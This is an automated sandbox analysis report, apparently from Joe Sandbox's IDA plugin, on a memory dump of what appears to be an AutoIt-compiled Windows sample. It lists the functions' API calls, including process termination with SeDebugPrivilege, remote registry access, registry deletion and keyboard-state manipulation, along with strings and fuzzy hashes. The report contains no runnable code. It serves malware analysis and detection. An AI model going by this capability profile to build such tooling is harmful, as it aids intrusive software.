Opcode ID: 585fa35d72b960bde6c0ee2fd26a5f07f0d3d71ce429430298f8f4a0276a5859
Instruction ID: 6e331419d66a5e7ffc9b920dd3de1b6671d1a98f102795e492cf5c4c2e55d44c
Opcode Fuzzy Hash: 585fa35d72b960bde6c0ee2fd26a5f07f0d3d71ce429430298f8f4a0276a5859
Instruction Fuzzy Hash: BB41C270A00308ABDB219FA4DC85FEE77E8EF08754F10042BF545A7291D3B99D84CB68

Function 0046172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00446532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00446554
Part of subcall function 00446532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00446564
Part of subcall function 00446532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004465F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046179A
GetLastError.KERNEL32 ref: 004617AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004617D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00461855
GetLastError.KERNEL32(00000000), ref: 00461860
CloseHandle.KERNEL32(00000000), ref: 00461895

Strings

SeDebugPrivilege, xrefs: 004617B8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 270c03403a1bab446a1558f45870165f337d3cd8e2a64d14bab469aaa4e9bc0a
Instruction ID: d2d618a15ae8a2f00e8176200d48da833dd737e9018933eaf1cf8cd54ec3b0d0
Opcode Fuzzy Hash: 270c03403a1bab446a1558f45870165f337d3cd8e2a64d14bab469aaa4e9bc0a
Instruction Fuzzy Hash: 3C41E231600200AFDB05EF55C8D6FAE77A5AF54304F08846EF9069F3D2EB7C99008B9A

Function 00445819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004458B8

Strings

info, xrefs: 00445859
warning, xrefs: 004458A1
question, xrefs: 00445871
stop, xrefs: 00445889
blank, xrefs: 0044583A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 5bfb3e2f318e15bc9736881087da9f68b7bd6f9ed755ebbf19411a783dae3153
Instruction ID: c7aeb5d251757967eccb0ff0c75affac7e8e2f1af9d52ff6fef3c92f1c8c2872
Opcode Fuzzy Hash: 5bfb3e2f318e15bc9736881087da9f68b7bd6f9ed755ebbf19411a783dae3153
Instruction Fuzzy Hash: 7A11D831749756BBBF116A55AC92DAB33DC9F25314B20003BF500A6283EBACAA11426D

Function 0044A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0044A806

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 7a8f8a471411fe2fa06817c37687fc143dfbfe5ddb5f0facf6f6bd21be5f378c
Instruction ID: ed324042c9a2b2701b04785601773068e8da0337221a3b70339ad8aef4324f64
Opcode Fuzzy Hash: 7a8f8a471411fe2fa06817c37687fc143dfbfe5ddb5f0facf6f6bd21be5f378c
Instruction Fuzzy Hash: 63C19F75A4121ADFEB00DF94C481BAEB7F4FF08314F24446AE605E7381D738A956CB9A

Function 00446B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00446B63
LoadStringW.USER32(00000000), ref: 00446B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00446B80
LoadStringW.USER32(00000000), ref: 00446B87
_wprintf.LIBCMT ref: 00446BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00446BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00446BA8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 584890564f3e5e306f944e4d1379c1c94349139ecdd1e8586c36002fd5fee6da
Instruction ID: 869915b13ef1c9269c9a5a225239d8a80d17e3bad1684c58eb68944aaf863664
Opcode Fuzzy Hash: 584890564f3e5e306f944e4d1379c1c94349139ecdd1e8586c36002fd5fee6da
Instruction Fuzzy Hash: D6018BF2D002187FEB11A790DD89EFB376CD704304F0048A6B745D2041EA749E844F79

Function 00462B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00462BF6

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 83d5d53ddb88e2323696c36a727cc8e698562aa1d4e2fef1faa29023a6294707
Instruction ID: 1436c638f4f59939a06b47cea4d9ff7190834685fc5c7c5e6771a34debbfa418
Opcode Fuzzy Hash: 83d5d53ddb88e2323696c36a727cc8e698562aa1d4e2fef1faa29023a6294707
Instruction Fuzzy Hash: F8919E71604201AFC700EF55C991B6EB7E5FF88318F04882EF99697291EB78E945CF4A

Function 0045961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00459691
WSAGetLastError.WSOCK32(00000000), ref: 0045969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 004596C8
6F6E1EB0.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004596E9
WSAGetLastError.WSOCK32(00000000), ref: 004596F8
inet_ntoa.WSOCK32(?), ref: 00459765
htons.WSOCK32(?,?,?,00000000,?), ref: 004597AA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ErrorLast$htonsinet_ntoaselect
String ID:
API String ID: 500251541-0
Opcode ID: 53fca022ea2d14d67ef67b7d0b24ca0273834dd059cdd7cbe07acbdb7bf4789e
Instruction ID: 03333625946aaac69fac2bd73161d1cd75afafec04d25dacc2d8625966a9cec0
Opcode Fuzzy Hash: 53fca022ea2d14d67ef67b7d0b24ca0273834dd059cdd7cbe07acbdb7bf4789e
Instruction Fuzzy Hash: 9F71B071504200ABD314EF65CC85E6FB7A8EB84718F104A2EF955A72D2DB38ED09CB5A

Function 0042A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0042A991

Part of subcall function 00427D7C: __FF_MSGBANNER.LIBCMT ref: 00427D91
Part of subcall function 00427D7C: __NMSG_WRITE.LIBCMT ref: 00427D98
Part of subcall function 00427D7C: __malloc_crt.LIBCMT ref: 00427DB8

__lock.LIBCMT ref: 0042A9A4
__lock.LIBCMT ref: 0042A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,004B6DE0,00000018,00435E7B,?,00000000,00000109), ref: 0042AA0C
RtlEnterCriticalSection.KERNEL32(8000000C,004B6DE0,00000018,00435E7B,?,00000000,00000109), ref: 0042AA29
RtlLeaveCriticalSection.KERNEL32(8000000C), ref: 0042AA39

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 9e49298281f73815b4fa3fb984943fc94ecb06dcc50e504b9963bd177dc87d8e
Instruction ID: 095ad9ea3ee5b9dc8ee4f7743ff6f5f47cd94fe39c9175350a546944aea4445a
Opcode Fuzzy Hash: 9e49298281f73815b4fa3fb984943fc94ecb06dcc50e504b9963bd177dc87d8e
Instruction Fuzzy Hash: 08412CB1B002219BEB10DF69EA4475DB7B06F01335F50422FE825AB2D1D7BC9861CB9E

Function 00468ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00468EE4
GetDC.USER32(00000000), ref: 00468EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00468EF7
ReleaseDC.USER32(00000000,00000000), ref: 00468F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00468F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00468F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0046BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00468F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00468FAA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0ef47895ff3c34fcde57304505890fa0abfee302c764309beada644b67fe252c
Instruction ID: 611ed22d8254807c85b721b2519c9d3a91f4afa22137adc93f8eb9d36c6173eb
Opcode Fuzzy Hash: 0ef47895ff3c34fcde57304505890fa0abfee302c764309beada644b67fe252c
Instruction Fuzzy Hash: CD318D72601214BFEB148F50CC49FEB3BAAEF49715F044169FE09EA291D6B99841CB78

Function 0041AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad86bef8a51725d2c0d98b22889656229f96a8a036ca2fc8ab77573dcfcf77f3
Instruction ID: 443efc5314a38a124e106a75654bdb1c3ac73b7b7c16e89892f607a707915728
Opcode Fuzzy Hash: ad86bef8a51725d2c0d98b22889656229f96a8a036ca2fc8ab77573dcfcf77f3
Instruction Fuzzy Hash: 74717E70901109EFCB04CF99CC48AEFBB75FF89314F14855AF915AA251C7389A52CFA9

Function 00462230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0046225A
_memset.LIBCMT ref: 00462323
ShellExecuteExW.SHELL32(?), ref: 00462368

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717

CloseHandle.KERNEL32(00000000), ref: 0046242F
FreeLibrary.KERNEL32(00000000), ref: 0046243E

Strings

@, xrefs: 00462334

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: d2e883e1dc2cdcc096bdce9b0ceb9c53bc7278a4cc73124182b81e29797c6beb
Instruction ID: fe3cf0ec08732bc4d8dc6c0a237379d0b91af6d135dd8010ae47e82a7a5a3c8a
Opcode Fuzzy Hash: d2e883e1dc2cdcc096bdce9b0ceb9c53bc7278a4cc73124182b81e29797c6beb
Instruction Fuzzy Hash: FC716D70A00619AFCF04EFA5C98199EB7F5FF48314F10846EE855AB391DB78AD40CB99

Function 00443BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00443C02
GetKeyboardState.USER32(?), ref: 00443C17
SetKeyboardState.USER32(?), ref: 00443C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00443CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00443CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00443D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00443D26

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ee78b3fa11ab1283d4dcb114b632edfbd7013f7b1c477bab22259d3f686a54bf
Instruction ID: 82043ea9113a7ea8027da421482251fe986c3d5fc201b27a04205b0442957917
Opcode Fuzzy Hash: ee78b3fa11ab1283d4dcb114b632edfbd7013f7b1c477bab22259d3f686a54bf
Instruction Fuzzy Hash: EF5107A19047D53DFB328B348C46B7BBFA99F06B06F08848EE0D5565C3D298EE84D758

Function 00463D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00463DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00463DCB
FreeLibrary.KERNEL32(00000000), ref: 00463E80

Part of subcall function 00463D72: RegCloseKey.ADVAPI32(?), ref: 00463DE8
Part of subcall function 00463D72: FreeLibrary.KERNEL32(?), ref: 00463E3A
Part of subcall function 00463D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00463E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00463E25

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 12b569d52cfcae5329f3aac8c945e3496a8da8dc61d948c4d82e4e9c1f5dbedc
Instruction ID: acc953e5f1aa74c6fab867faaf90b0538a7f1f49f7e5a1b73acc91b2943ac2f8
Opcode Fuzzy Hash: 12b569d52cfcae5329f3aac8c945e3496a8da8dc61d948c4d82e4e9c1f5dbedc
Instruction Fuzzy Hash: B83119B1D01109BFDB159F90DC89AFFB7BCEF08305F00056AA512A2290E6759F499BB5

Function 00468FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00468FE7
GetWindowLongW.USER32(00989630,000000F0), ref: 0046901A
GetWindowLongW.USER32(00989630,000000F0), ref: 0046904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00469081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004690AB
GetWindowLongW.USER32(00000000,000000F0), ref: 004690BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004690D6

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: cd13acf13326ff912c1b6a8db85b63e49255f30fb394f9c84299d8e026cc45a0
Instruction ID: 6c1353d9cf321ea898b21e40fd174f800445483b6db885a06172db092e97f94c
Opcode Fuzzy Hash: cd13acf13326ff912c1b6a8db85b63e49255f30fb394f9c84299d8e026cc45a0
Instruction Fuzzy Hash: E7313934700215DFDB20CF58DC84F6537A9FB4A718F14026AF5199B2B2DBB5AC40DB4A

Function 004408AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004408F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00440918
SysAllocString.OLEAUT32(00000000), ref: 0044091B
SysAllocString.OLEAUT32(?), ref: 00440939
SysFreeString.OLEAUT32(?), ref: 00440942
StringFromGUID2.OLE32(?,?,00000028), ref: 00440967
SysAllocString.OLEAUT32(?), ref: 00440975

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: cebbbf19b5b55addaad6d6587a8c56073dd7b7d6e0d40113f6ce2697a897e9ea
Instruction ID: 670d1140b47f98b37c90b3f1203f5f0870597e9ef3b46a752cba0966611f4e2a
Opcode Fuzzy Hash: cebbbf19b5b55addaad6d6587a8c56073dd7b7d6e0d40113f6ce2697a897e9ea
Instruction Fuzzy Hash: 81219776601219AFEB10AF78DC88DAF73ACEF09360B048526FA15DB291D674EC458768

Function 00442472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00442485
__wcsnicmp.LIBCMT ref: 004424A6
__wcsnicmp.LIBCMT ref: 004424C0

Strings

#notrayicon, xrefs: 0044247D
#requireadmin, xrefs: 004424A0
#OnAutoItStartRegister, xrefs: 004424BA

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 1851d1b4e6960cd03ac9d1d05ef331729ad499fc0484a12b4716bd25480e5267
Instruction ID: a173347789446804f2164791aadcb3723f806e4114576909bb7f9119596bce02
Opcode Fuzzy Hash: 1851d1b4e6960cd03ac9d1d05ef331729ad499fc0484a12b4716bd25480e5267
Instruction Fuzzy Hash: CF216A7160012177E620E6359E12FB77398EF64308FA0402BF446A7182E6ED9982C2AD

Function 00440986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004409CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004409F1
SysAllocString.OLEAUT32(00000000), ref: 004409F4
SysAllocString.OLEAUT32 ref: 00440A15
SysFreeString.OLEAUT32 ref: 00440A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00440A38
SysAllocString.OLEAUT32(?), ref: 00440A46

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: bdb25d7be96f370230d0b4c1ec6a9438b81f23539dbcd8e1c0913e2efecb882c
Instruction ID: 220da2e8b19451a2a961b14a861e80d9e5b321ba20eb580aa9f72d8ab3c780ef
Opcode Fuzzy Hash: bdb25d7be96f370230d0b4c1ec6a9438b81f23539dbcd8e1c0913e2efecb882c
Instruction Fuzzy Hash: 28219B75601204AFEB10EFB8DD89DAB77ECEF183607048536FA09DB2A1D674EC458B58

Function 0046A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
